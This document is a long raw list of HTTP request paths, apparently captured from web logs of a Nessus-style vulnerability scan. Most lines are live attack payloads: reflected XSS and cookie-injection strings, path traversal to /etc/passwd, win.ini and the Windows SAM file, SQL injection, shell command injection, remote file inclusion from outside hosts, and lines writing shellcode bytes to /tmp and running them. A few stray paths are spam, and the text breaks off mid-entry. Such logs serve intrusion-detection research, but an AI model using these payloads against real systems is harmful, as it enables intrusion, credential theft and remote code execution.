#\n/ddoworrl.aspx?<meta http-equiv=set-cookie content=\"testvlau=8517\">\n/examples/jsp/jsp2/el/add_url.htm?node=<script>alert('xss')</script>\n/xfkun1ku.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/cats.exe\n/scripts/h3d1n9eaqxv3.php\n/i2n4v4rl.php?<script>cross_site_scripting.nasl</script>\n/606wkcop.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/num/sawmill6cl.exe?ho+{complete_version}\n/jdx255ea.idc?<meta http-equiv=set-cookie content=\"testziyq=5055\">\n/examples/jsp/error/index.php?lng=../system_footer&sensor_program=phpsysinfo_241.nasl\n/cgi-bin/usrdetails.php?sgnuptype=csaleid<script>nessus</script>\n/byrg33fw.html?<meta http-equiv=set-cookie content=\"testexuu=5340\">\n/<meta http-equiv=set-cookie content=\"testhvje=9403\">\n/examples/jsp/colors/print.php?what=article&id='\n/scripts/bpk_bsfe_4vq.pl\n/<script>alert('vulnerable')</script>.stm\n/javascript/2013.exe\n/cgi-bin/edit.jsp?page=user&editor=../../../install\n/?<script>document.cookie=\"testlerc=2575;\"</script>\n/tikiwiki/tiki-graph_formula.php?f[]=x.tan.phpinfo()&h=1&max=2&min=1&s=1&t=png&title=@rfiurl&w=1\n/javascript/website.exe\n/weq93ppb.do?<script>cross_site_scripting.nasl</script>\n/awstats/awstats.pl?migrate=|echo;/bin/echo -en \"vj\\0001j\\0002\\0211\\0341j\\0001jfx\\0133\\0315\\0200\\0222\" >> /tmp/urcppbumwm0;echo|awstats902799.txt\n/cgi-bin/core/editor.php?editor_insert_bottom=/etc/passwd\n/9kr0ih0v.pl?<script>document.cookie=\"testzgnm=1183;\"</script>\n/3rdparty/phpmyadmin/export.php?what=../../../../../../../../../../../../etc/passwd\\x00\n/javascript/shell.exe\n/examples/jsp/cal/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331904405')</script>\n/iissamples/exair/search/search.idq?citemplate=../../../../../../../../../../winnt/win.ini\n/hjdzm96v.nsf?<meta http-equiv=set-cookie content=\"testbyqe=7474\">\n/include/scripts/send_email_cache.php?dir=http://192.168.202.118:8080/tzhfyzkbomspvm?\n/i7prbs22.mscgi?<script>document.cookie=\"testjnre=7328;\"</script>\n/recordings/direct.php?rf=/etc/passwd\\x00\n/javascript/art.exe\n/byrg33fw.cgi?<script>document.cookie=\"testexuu=5340;\"</script>\n/javascript/env.exe\n/main.php?stuff=\"|ping\\x0b-w\\x0b7000\\x0b-n\\x0b1\\x0b1.2.3.4|rem\\x0b\n/top.php?stuff=\"\\x0auname\\x09>q64118446\\x09#\n/kong's/\n/d765w06j.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n<script>document.cookie=\"testylik=3403;\"</script>\n/iktok2bw.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/manager/nph-mr.cgi?do=loginhelp&configlanguage=../../../../../../../etc/passwd\\x00\n/examples/jsp/jsp2/el/language.php?data_dir=/etc/passwd\\x00\n/top.php?stuff=\"ver\\x0c>q81327195&rem\\x0c\n/0qhcnefz.asp?<script>cross_site_scripting.nasl</script>\n/examples/jsp/cal/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904366&lang_crm=../../vtigerservice.php\\x00\n/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331904404')</script>\n/webcgi/gwweb.exe?help=bad-request\n/manager/index.php?cat_select=<script>foo</script>\n/cacti/search.jsp?q=%\"<script>alert(1331909235)</script>\n/examples/jsp/jsp2/el/index.php?gadget=glossary&action=view&term=<script>alert('jaws_xss.nasl');</script>\n/help.php?q=\"\\x0arm\\x09q73265631\\x09#\n/examples/jsp/checkbox/ion-p.exe?page=c:\\\\winnt\\\\win.ini\n/javascript/htpasswd/\n/scripts/www/delivery/ac.php?bannerid=-219+or+1=1\n/javascript/testing.exe\n/p043snfr.cfc?<script>cross_site_scripting.nasl</script>\n/main.php?logout=\"ping -w 9000 -n 1 4.3.2.1&rem \n/gadgets/blog/blogmodel.php?path=/etc/passwd\\x00\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+00+00+00+00+00+40+00+00+c0+2e+69+64+61+74+61+00+00+00+10+00+00+00+30+00+00++>>esbq\n/javascript/htpasswd.config\n/3hlysl2x.aspx?<script>document.cookie=\"testgjbe=8505;\"</script>\n/hipkz026.cfc?<meta http-equiv=set-cookie content=\"testyrbs=2855\">\n/vhzmaia2.asp?<meta http-equiv=set-cookie content=\"testkogj=3979\">\n/javascript/sp.exe\n/cacti/index.php?page=/etc/passwd\\x00\n/scripts/rx9ysf2iwv4j.sh\n/admin/config.php?type=setup&display=extensions&extdisplay=`<script>alert('1')</script>`\n/qhvu0pdg.cgi?<meta http-equiv=set-cookie content=\"testchuc=2100\">\n/examples/jsp/num/www/delivery/fc.php?max_type=../../../../../../../../../../etc/passwd\\x00\n/javascript/elements.exe\n/help.php?q=\"&rm q31935143&rem \n/recordings/index2.cgi?frames=yes&board=demo&mode=current&threads=collapse&message=../../../../../../../../../../etc/passwd\\x00\n/3m5knyc4.fts?<script>document.cookie=\"testbgqj=6434;\"</script>\n/en-us/account/apps/pbcs.dll/misc?url=../../../../../../../../../../../../boot.ini\n/examples/servlets/servlet/item.fts?href=\"><script>alert(\"ftgate_44002.nasl\")</script>;\n/applescript/\n/zmvq66jy.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/test.php?evalme=eval($_server[http_x_mfmsxqtxsaaq]);\n/primalscript_3/\n/sc_subscription/\n/examples/jsp/colors/admin/file_manager.php?action=read&filename=../../../../../../../../etc/passwd\n/rbec2ohx.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/jsp2/jspx/search.cgi?..\\..\\..\\..\\..\\..\\winnt\\win.ini\n/javascript/production.exe\n/ddoworrl.idc?<meta http-equiv=set-cookie content=\"testvlau=8517\">\n/goa'uld/\n/p043snfr.cgi?<script>cross_site_scripting.nasl</script>\n/examples/jsp/jsp2/jspx/sgdynamo.exe?htname=<script>foo</script>\n/help.php?q=\"del\\x09q18952146\\x09#\n/examples/jsp/num/cwmail.exe\n/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('/./tmp/mpnqzgnare0+>+/dev/null+&'); function v\n/dslpwt15.exe?<meta http-equiv=set-cookie content=\"testtkio=5454\">\n/scripts/editor/filemanager/connectors/php/upload.php?command=fileupload&type=file&currentfolder=/fckeditor_currentfolder_file_upload-1331919231.php.\n/cgi-bin/sensepost.exe?/c+dir\n/main.php?logout=\"\\x0duname\\x09>q59885581\\x09#\n/story.pl?next=../../../../../etc/passwd\\x00\n/scripts/www/delivery/ac.php?bannerid=-106+or+1=1\n/manager/index.php?gadget=glossary&action=viewterm&term=<script>alert('jaws_xss.nasl');</script>\n/aj3pf49c.cgi?<meta http-equiv=set-cookie content=\"testnofv=4170\">\n/cgi-perl/view_item?html_file=../../../../../../../../../../etc/passwd\\x00\n/javascript/.passwd.pdf\n/supermarket_20subscription/\n/scripts/nckowqpd4zng.asp\n/en-us/n9xlumt5.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('/bin/echo+-en+\"\\0174\\0044\\0000\\0377\\0347\"+>>+/tmp/bxtfwlgmsj0;').\"]=1\n/scripts/bbcode_ref.php?user=mtoxoje6mtoxoje6mtoxoje6li4vli4vli4vli4vli4vzxrjl3bhc3n3zaak\n/scripts/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331918999\n/qczkquis.html?<script>document.cookie=\"testkwlg=5591;\"</script>\n/examples/jsp/checkbox/admin.php?style=../../../../../../../../../../../../etc/passwd\\x00\n/javascript/actions.exe\n/javascript/vendor.exe\n/recordings/htsearch?exclude=`/etc/passwd`\n/examples/jsp/cal/myevent.php?myevent_path=/etc/passwd\\x00\n/g3w7y7u5.idc?<script>document.cookie=\"testbfpq=3326;\"</script>\n/2 girls with dildo's 2/\n/cacti/libraries/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/j6181022.exe/\n/scripts/faq.php?action=&type=view&s=&id=-1' union select 0,1229033432,0,0,0,0,0--\n/examples/jsp/checkbox/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331904454,1014388214 -- \n/7o5qp766.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-bin/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor\n/en-us/account/admin/plog-admin-functions.php?config[basedir]=/etc/passwd\\x00\n/scripts/eezuu7xc7ge3.cfm\n/examples/jsp/checkbox/common/visiteurs/include/menus.inc.php?lvc_include_dir=/etc/passwd\\x00\n/<meta http-equiv=set-cookie content=\"testuhsv=9753\">\n/yef5f3d5.dll?<meta http-equiv=set-cookie content=\"testcrcv=6167\">\n/y8pmygrp.cfm?<script>cross_site_scripting.nasl</script>\n/help.php?q=\"del,q99215968&rem,\n/index.php?id='union/**/select/**/0,0,139114652,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/zroo33l4.cfm?<meta http-equiv=set-cookie content=\"testiklc=904\">\n/zln2hm2z.exe?<script>document.cookie=\"testblcp=8120;\"</script>\n/ca/..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\winnt/\\\\win.ini\n/?<script>document.cookie=\"testulex=4996;\"</script>\n/iajtej82.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/h4bi26jd.fts?<script>document.cookie=\"testhrzx=1150;\"</script>\n/main.php?stuff=';rm\\x09q26313493\\x09#\n/help.php?q=\"ver\\x09>q34493999&rem\\x09\n/gvx7m5ti.dll?<script>document.cookie=\"testwldz=3506;\"</script>\n/0u75ldxq.do?<script>cross_site_scripting.nasl</script>\n/nyjgaorz.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/glossary.exe\n/help.php?q=\";uname\\x09>q65733963\\x09#\n/javascript/ps.exe\n/scripts/cxvae_g3rjys.sh\n/d7ktpmcq.jspa?<script>cross_site_scripting.nasl</script>\n/cacti/commerce.cgi?page=../../../../../etc/passwd\\x00index.html\n/hydrocodonepurchaseonlinewithoutprescription/\n/cwhp/auditlog.do?file=..............\\x08oot.ini\n/y8pmygrp.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/mpcgi/a1stats/a1disp4.cgi?../../../../../../../etc/passwd\n/help.php?q=;\n/ht8pn8uq.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/lsoix5h3.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/mx.exe\n/javascript/del.exe\n/scripts/index.php?setlang=gcards_dir_transversal.nasl&lang[gcards_dir_transversal.nasl][file]=../../../../../../../../../../../../etc/passwd\n/modules.php?name=your_account&op=userinfo&uname=<script>alert('vulnerable')</script>\n/scripts/app_and_readme/navigator/index.php?page=http://192.168.202.96:8080/vir0v3xfc?\n/script_path/cms/classes/openengine/filepool.php?oe_classpath=@rfiurl?oe_classpath=@rfiurl?\n/cgi-bin/starnet/addons/slideshow_full.php?album_name='238293775\n/script/ident/ident.inc.php?path_inc=http://192.168.202.118:8080/2aibfaczmac8?\n/zmvq66jy.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/7uz3ok60.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/checkbox/doc/index.php?s=/etc/passwd\\x00\n/examples/jsp/checkbox/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../etc/passwd\n/vhzmaia2.dll?<script>document.cookie=\"testkogj=3979;\"</script>\n/en-us/ddoworrl.html?<script>document.cookie=\"testvlau=8517;\"</script>\n/l13b77e5.aspx?<meta http-equiv=set-cookie content=\"testjvvf=7721\">\n/main.php?stuff=ver\\x09>q57361371&rem\\x09\n/javascript/jira.exe\n/en-us/account/bemarket/shop/index.php?pageurl=viewpage&filename=../../../../../../../../../../../../../../etc/passwd\n/examples/jsp/sessions/crystalimagehandler.aspx?dynamicimage=../../../../../../../../winnt/system.ini\n/help.php?q=';rm q16954753 #\n/javascript/logger.exe\n<meta http-equiv=set-cookie content=\"testtfvh=2141\">\n/examples/jsp/jsp2/jspx/classes/adodbt/sql.php?classes_dir=/etc/passwd\\x00\n/cgi-bin/cvslog.cgi?file=*&rev=&root=<script>alert('vulnerable')</script>\n/newsdesk.cgi?t=../../../../../../etc/passwd\n/9ko6m4c8.exe?<meta http-equiv=set-cookie content=\"testylik=3403\">\n/cgi-bin/apps/pbcs.dll/misc?url=../../../../../../../../../../../../boot.ini\n/cacti/tinybrowser/upload.php?badfiles=1><script>alert('tinybrowser_multiple_xss.nasl')</script>\n/gvx7m5ti.exe?<script>document.cookie=\"testwldz=3506;\"</script>\n/main.php?logout=\"\\x0ddel\\x09q83433457\\x09#\n/oie504mr.php3?<meta http-equiv=set-cookie content=\"testtpby=7052\">\n/main.php?stuff=ver\\xa0>q77895939&rem\\xa0\n/1r8cfrlf.cfc?<meta http-equiv=set-cookie content=\"testydan=5106\">\n/ny1b3qq4.aspx?<script>cross_site_scripting.nasl</script>\n/scripts/piywzua5hwer.inc\n/top.php?stuff=\"\\x0duname >q75872817 #\n/javascript/tapes.exe\n/help.php?q=\"uname\\x09#\n/javascript/address.exe\n/0u75ldxq.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/admin/news.admin.php?path_to_script=http://192.168.202.118:8080/zz5thkvtmlgl??&cmd=ls\n/scripts/neomail-prefs.pl?sessionid=nessus-session-0.neomail_sessionid_validation.nasl&action=addfolder&foldername=joxad2rlaixd6tbdj\n/ybz5rz7a.jspa?<meta http-equiv=set-cookie content=\"testsbvw=6289\">\n/r3le3om5.fts?<script>cross_site_scripting.nasl</script>\n/examples/jsp/error/popup.php?include_path=/etc/passwd\\x00\n/main.php?stuff=&ver;>q41243131&rem;\n/phpmyadmin/index.php?selskin=../inc/boxleft.inc\\x00&xposbox[l][]=/etc/passwd\\x00\n/n9xlumt5.jspa?<script>cross_site_scripting.nasl</script>\n/ju0u7kfo.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?stuff=;rm q23784271 #\n/\\..\\..\\..\\..\\..\\..\\..\\boot.ini\n/examples/jsp/error/bandwidth/index.cgi?action=showmonth&year=<script>foo</script>&month=<script>foo</script>\n/u95h6ymu.aspx?<script>document.cookie=\"testkhwc=4028;\"</script>\n/main.php?logout=\"uname\\x09>q46762746\\x09#\n/pxagj7n7.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/num/myevent.php?myevent_path=/etc/passwd\\x00\n/examples/jsp/sessions/awstatstotals.php?sort=\"].passthru('id').exit().$a[\"\n/reg.exe\n/apps/web/vs_diag.cgi?server=<script>alert('vulnerable')</script>\n/examples/servlets/servlet/script/cat_for_gen.php?ad=1&ad_direct=../&m_for_racine=</option></select><?phpinfo();?>\n/scripts1/\n/examples/jsp/sessions/lib/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/egaet53a.kspx?<script>cross_site_scripting.nasl</script>\n/javascript/500.exe\n/javascript/tsweb.exe\n/help.php?q=\"\\x0ddel q44862556 #\n/recordingssearch-results.dot?search_query=nessus\"><script>alert('dotcms_search_query_xss.nasl')</script>/\n/r3le3om5.html?<script>cross_site_scripting.nasl</script>\n/help.php?q=\"&rm\\x0cq73531956&rem\\x0c\n/scripts/xuicksry9grj.html\n/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1331923204','5'--\n/o1zj4u9v.exe?<meta http-equiv=set-cookie content=\"testabrn=6368\">\n/phpmyadmin/documentation.html?phpmyadmin=passthru('id')\n/scripts/4rzefq7dsowk.inc\n/jackrabbit/search.jsp?q=%\"<script>alert(1332008323)</script>\n/en-us/fo564rei.cgi?<script>cross_site_scripting.nasl</script>\n/scgi-bin/a1disp3.cgi?../../../../../../../../../../etc/passwd\n/examples/jsp/error/admin/plog-admin-functions.php?config[basedir]=/etc/passwd\\x00\n/main.php?stuff=uname >q72535511 #\n/0rufe52p.html?<script>cross_site_scripting.nasl</script>\n/main.php?stuff='\\x0adel\\x09q88589696\\x09#\n/8x6w469u.jspa?<script>document.cookie=\"testgfjr=1286;\"</script>\n/fmnveedu.idc?<script>document.cookie=\"testgfbr=7014;\"</script>\n/m4kkjf8l.cfc?<script>document.cookie=\"testyglc=8988;\"</script>\n/transcripts/\n/index.php?c=access&a=login&ref_c=nessus\"><script>alert(10748254)</script>&ref_a=projectpier_login_page_xss.nasl\"><script>alert(1537134898)</script>\n/examples/jsp/jsp2/el/hw3.cgi?daysonly=0).system('id').(\n/scripts/login.php?req=\"><script>alert('testlink_login_req_param_xss.nasl-1331908833')</script>\n<script>document.cookie=\"testjnre=7328;\"</script>\n/tmp_view.php?file=/etc/passwd\n/zuihld5m.dll?<script>cross_site_scripting.nasl</script>\n/cgi-home/vssetcookie.exe\n/cacti/index.pl/homels?func=add;class=webgui::asset::wobject::article;print `id`;\n/javascript/htpasswd.tar.bz2\n/javascript/velocity.exe\n/phpwcms_template/inc_script/frontend_render/navigation/config_html_menu.php?html_menu_dirpath=http://192.168.202.118:8080/tzhfyzkbomspvm?\n/scripts/main.php\n/examples/servlets/servlet/language.php?data_dir=/etc/passwd\\x00\n/cgi.cgi/webcart/webcart.cgi?change=yes&code=phold&config=mountain&nextpage=;cat /etc/passwd|\n/169okeyj.cfc?<script>document.cookie=\"testxeoi=3573;\"</script>\n/scripts/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1332010400','5'--\n/newsarchive.php?path_to_script=http://192.168.202.118:8080/ghl9il??&cmd=ls\n/apavxugx.cgi?<script>document.cookie=\"testdnbh=5237;\"</script>\n/en-us/h5sc3gxy.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/zln2hm2z.cfm?<meta http-equiv=set-cookie content=\"testblcp=8120\">\n/eg2u8pbv.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/edv3mapy.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/phpmyadmin/forum.php?do=viewtopic&cat=1&topic=1&page=1?<script>foo</script\n/examples/servlets/servlet/atomicboard/index.php?location=../../../../../../../../../../../../../../../etc/passwd\n/examples/jsp/error/faq.php?action=&type=view&s=&id=-1' union select 0,2039524728,0,0,0,0,0--\n/examples/servlets/servlet/htgrep/file=index.html&hdr=/etc/passwd\n/en-us/odzk29aa.fts?<script>document.cookie=\"testtfvh=2141;\"</script>\n/3m5knyc4.jsp?<script>document.cookie=\"testbgqj=6434;\"</script>\n/javascript/encrypt.exe\n/new_subscription/\n/iv5vkgam.cfm?<meta http-equiv=set-cookie content=\"testfosd=94\">\n/cacti/search=<script>alert('xss')</script>\n/cacti/popup.php?include_path=/etc/passwd\\x00\n/en-us/s7qus4g3.htm?<script>cross_site_scripting.nasl</script>\n/cgi-bin/formmail.cgi?<script>alert(\\\"vulnerable\\\");</script>\n/scripts/20review.asp?productcode='\n/towels-0.1/src/scripture.php?pageheaderfile=http://192.168.202.118:8080/tzhfyzkbomspvm?\n/examples/jsp/jsp2/jspx/index.php?p='nessus\n/union avenue - now here's union avenue/\n/examples/jsp/jsp2/jspx/faq.php?action=&type=view&s=&id=-1' union select 0,32936669,0,0,0,0,0--\n/x2gyorli.dll?<script>document.cookie=\"testwhac=3130;\"</script>\n/googlefight-xss/\n/top.php?stuff='\\x0adel\\x09q46955555\\x09#\n/script/ident/loginliste.php?path_inc=http://192.168.202.118:8080/zz5thkvtmlgl?\n/contribute.pl?template=/etc/passwd&contribdir=.&plugin=alkalay_cmd_exec.nasl\n/main.php?stuff=\";uname\\x09>q74362376\\x09#\n/top.php?stuff=\"|ping,-w,8000,-n,1,4.3.2.1|rem,\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\";ls+-l;chmod+555+/tmp/rkejrxdjgj;\"\n/genscript/\n/javascript/bios.exe\n/cgi-914/fileseek.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head=\n/<img src=\"javascript:alert(cross_site_scripting.nasl);\">.cfm\n/tukodz3j.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q='&uname\\x09>q11888742\\x09#\n/if69ddo1.jsp?<meta http-equiv=set-cookie content=\"testiabz=5220\">\n/en-us/oie504mr.dll?<script>document.cookie=\"testtpby=7052;\"</script>\n/recordings/lang/lang.php?lang_path=/etc/passwd\\x00\n/zroo33l4.htm?<script>document.cookie=\"testiklc=904;\"</script>\n/scriptpage/source/includes/load_forum.php?mfh_root_path=http://192.168.202.118:8080/iroy1gvqrrqu?\n/addvip.php?msetstr[\"progsdir\"]=http://192.168.202.118:8080/2aibfaczmac8?\n/scripts/editor/filemanager/connectors/php/upload.php?command=fileupload&type=file&currentfolder=/fckeditor_currentfolder_file_upload-1332009308.php.\n/scripts/polls.scr.php?globals[pth][classes]=http://192.168.202.96:8080/4dckqcc0acprbz??\n/manager/rss.php?blogid=1&profile=../../config/config.properties.php\\x00\n/en-us/esmozg5d.idc?<script>cross_site_scripting.nasl</script>\n/nyvbv05h.idc?<script>document.cookie=\"testftxz=5980;\"</script>\n/javascript/q3.exe\n/cgi-bin/shops/sub.asp?isub=dupaypal_sql_injections.nasl'\n/memberlist.php?action=profile&id=1' select * from force_mysql_warning\n/top.php?stuff='\\x0auname\\x09>q14875513\\x09#\n/top.php?stuff=&ver,>q26167811&rem,\n/l13b77e5.idc?<script>document.cookie=\"testjvvf=7721;\"</script>\n/rbec2ohx.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/phpmyadmin/mmstdod.cgi?alternate_templates=| echo \"content-type: text/html\";echo \"\" ; id\\x00\n/scripts/shopaddtocart.asp?productid='42\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('/./tmp/xdnhmjnjeg0+>+/dev/null+&').\"]=1\n/top.php?stuff=\"&ver&rem;\n/javascript/document.sql\n/phpmyadmin/snpfiltered.pl?t=c&u=<script>foo</script>\n/scripts/starnet/addons/slideshow_full.php?album_name='2115105114\n/en-us/<meta http-equiv=set-cookie content=\"testttvs=7163\">\n/examples/jsp/checkbox/yabb.pl?board=news&action=display&num=../../../../../../etc/passwd\\x00\n/scripts/6gl21a1hiz3s.asp\n/cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd\\x00&action=view&matchview=1\n/script/menu/menuadministration.php?path_inc=http://192.168.202.118:8080/zz5thkvtmlgl?\n/scripts/qg9h0c0svvat.cgi\n/examples/jsp/checkbox/news/index.dot?id=../../../../../../../../../../../..//etc/passwd\\x00.jpg\n/script/ident/loginmodif.php?path_inc=http://192.168.202.118:8080/2aibfaczmac8?\n/examples/jsp/jsp2/el/admin/plog-admin-functions.php?config[basedir]=/etc/passwd\\x00\n/?<meta http-equiv=set-cookie content=\"testxeoi=3573\">\n/javascript/document.error\n/script/param/param.inc.php?path_inc=http://cirt.net/rfiinc.txt?\n/u95h6ymu.nsf?<meta http-equiv=set-cookie content=\"testkhwc=4028\">\n/top.php?stuff=\"ver\\xa0>q29642432&rem\\xa0\n/examples/jsp/error/mail.php?id='/**/union/**/select/**/1,2,1331904464,4--&blog=1\n/en-us/account/main.php?g2_itemid=../../../../../license\\x00\n/0rufe52p.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff=\"\\x0dsleep 9 #\n/examples/jsp/error/cwmail.exe\n/en-us/odzk29aa.mscgi?<meta http-equiv=set-cookie content=\"testtfvh=2141\">\n/cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd\n/en-us/33y9gcqq.php?<script>document.cookie=\"testnvxc=4301;\"</script>\n/top.php?stuff=&ver\\x0c>q64272863&rem\\x0c\n/javascript/ordered.exe\n/scripts/index.php?op=disp&filedata=c3lzdgvtkcdpcgnvbmzpzyavywxsjyk7\n/jujgxwav.html?<script>document.cookie=\"testknim=9383;\"</script>\n/cgi-bin/cfgwiz.exe\n/examples/jsp/jsp2/jspx/bandwidth/index.cgi?action=showmonth&year=<script>foo</script>&month=<script>foo</script>\n/zv8tv7h8.dll?<meta http-equiv=set-cookie content=\"testcqwz=9752\">\n/myhome.php?action=messages&box=<script>alert('vulnerable')</script>\n/edv3mapy.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/0w155a7c.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/odzk29aa.pl?<script>document.cookie=\"testtfvh=2141;\"</script>\n/examples/jsp/checkbox/gadgets/blog/blogmodel.php?path=/etc/passwd\\x00\n/ciamos_path/modules/forum/include/config.php?module_cache_path='http://192.168.202.96:8080/swgnhpydbq0t?'\n/scripts/bveygnpo6hkw.php\n/scripts/sqwebmail?redirect=\\x0d\\x0a\\x0d\\x0asqwebmail_http_splitting.nasl\n/main.php?logout=\"&ver;>q21715323&rem;\n/bn857frh.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-local/c32web.exe/getimage?imagename=customeremail.txt\\x00.pdf\n/j2kdmfw4.aspx?<script>cross_site_scripting.nasl</script>\n/iktok2bw.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scriptpath/footers.php?tinybb_footers=http://192.168.202.96:8080/llumt7msyau5y?\n/hipkz026.x?<meta http-equiv=set-cookie content=\"testyrbs=2855\">\n/help.php?q=\"&uname >q16957345 #\n/path_script/createurl.php?formurl=http://192.168.202.118:8080/moclyxlwqyfjnp?\n<meta http-equiv=set-cookie content=\"testqppc=8767\">\n/en-us/account/supporter/tupdate.php?groupid=change&sg='\n/examples/jsp/colors/admin.php?style=../../../../../../../../../../../../etc/passwd\\x00\n/jnt3f86c.cgi?<script>document.cookie=\"testcmax=9270;\"</script>\n/9ko6m4c8.do?<meta http-equiv=set-cookie content=\"testylik=3403\">\n/examples/jsp/sessions/login.php?user=\"><script>alert('pubcookie_xss.nasl');</script>\n/iscripts/\n/zroo33l4.fts?<script>document.cookie=\"testiklc=904;\"</script>\n/bmeun223.jspa?<script>document.cookie=\"testhhwu=7044;\"</script>\n/scripts/h3d1n9eaqxv3.inc\n/d44uk9h2.dll?<script>document.cookie=\"testmybc=2088;\"</script>\n/men&#39;s-issues/\n/xssproxy/\n/l13b77e5.php3?<meta http-equiv=set-cookie content=\"testjvvf=7721\">\n/help.php?q='&del\\x09q61993923\\x09#\n/top.php?stuff=\"rm q51291193&rem \n/clk;65409221;7163019;d/\n/g3w7y7u5.html?<script>document.cookie=\"testbfpq=3326;\"</script>\n/examples/jsp/cal/index.php?chemin=../../../../../../..//etc\n/eei78ore.idc?<script>cross_site_scripting.nasl</script>\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+24+1c+50+6a+00+68+65+73+73+00+68+50+72+6f+63+68+74+69+6f+6e+68+6f+72+6d+61++>>esbq\n/main.php?stuff=\"rm\\x0cq36356367&rem\\x0c\n/scripts/ui/login?user=nessus-1332008518\n/ny1b3qq4.asp?<script>cross_site_scripting.nasl</script>\n/scripts/init.php?http_pst_vars[gallery_basedir]=http://xxxxxxxx./\n/javascript/htpasswd.error\n/t7tm4m0b.cfm?<script>cross_site_scripting.nasl</script>\n/0rufe52p.do?<script>cross_site_scripting.nasl</script>\n/en-us/odzk29aa.php?<meta http-equiv=set-cookie content=\"testtfvh=2141\">\n/scripts/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,203712303,473923447,1,1,1,1,1--&blogid=1\n/j2kdmfw4.fts?<script>cross_site_scripting.nasl</script>\n/b1q8bywu.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/t7tm4m0b.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/phprocketaddin/?page=../../../../../../../../../../../../../../../etc/passwd\n/javascript/browser.exe\n/apavxugx.mscgi?<script>document.cookie=\"testdnbh=5237;\"</script>\n/main.php?logout=\"ver\\x0c>q94269861&rem\\x0c\n/scripts/u7m5ok8eqpfy.cgi\n/../../../../../../winnt/repair/sam\n/esmozg5d.html?<script>cross_site_scripting.nasl</script>\n/examples/jsp/cal/story.pl?next=../../../../../etc/passwd\\x00\n/jnv890lt.fts?<script>cross_site_scripting.nasl</script>\n/top.php?stuff=(1-(select null from (select null) t where 'n681t2ki'='n681t2ki'))\n/lmw4r201.html?<script>document.cookie=\"testwews=8477;\"</script>\n/cgi-exe/fileseek2.cgi?foot=&head=;cat /etc/passwd|\n/phpmyadmin/save.php?file_save=/etc/passwd\n<meta http-equiv=set-cookie content=\"testtbjy=7334\">\n/scripts/bveygnpo6hkw.php3\n/main.php?logout=\\x0duname\\x09>q96841788\\x09#\n/templates/tmpl_dfl/scripts/index.php?dir[inc]=http://192.168.202.118:8080/zz5thkvtmlgl?\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('/bin/echo+-en+\"\\0174\\0044\\0000\\0377\\0347\"+>>+/tmp/rrqfvzowbk0;').\"]=1\n/scripts/httpodbc.dll\n/scriptpage/source/includes/load_forum.php?mfh_root_path=http://192.168.202.96:8080/swgnhpydbq0t?\n/examples/jsp/checkbox/forumdisplay.php?fid=21\"><script>x</script>\n/javascript/helper.exe\n/scripts/sitemap.scr.php?globals[pth][classes]=@rfiurl?globals[pth][classes]=@rfiurl?\n/main.php?stuff=\"&ver\\x0b>q62577827&rem\\x0b\n/examples/jsp/checkbox/cgiforum.pl?thesection=../../../../../../../../etc/passwd\\x00\n/rpxyx07v.dll?<meta http-equiv=set-cookie 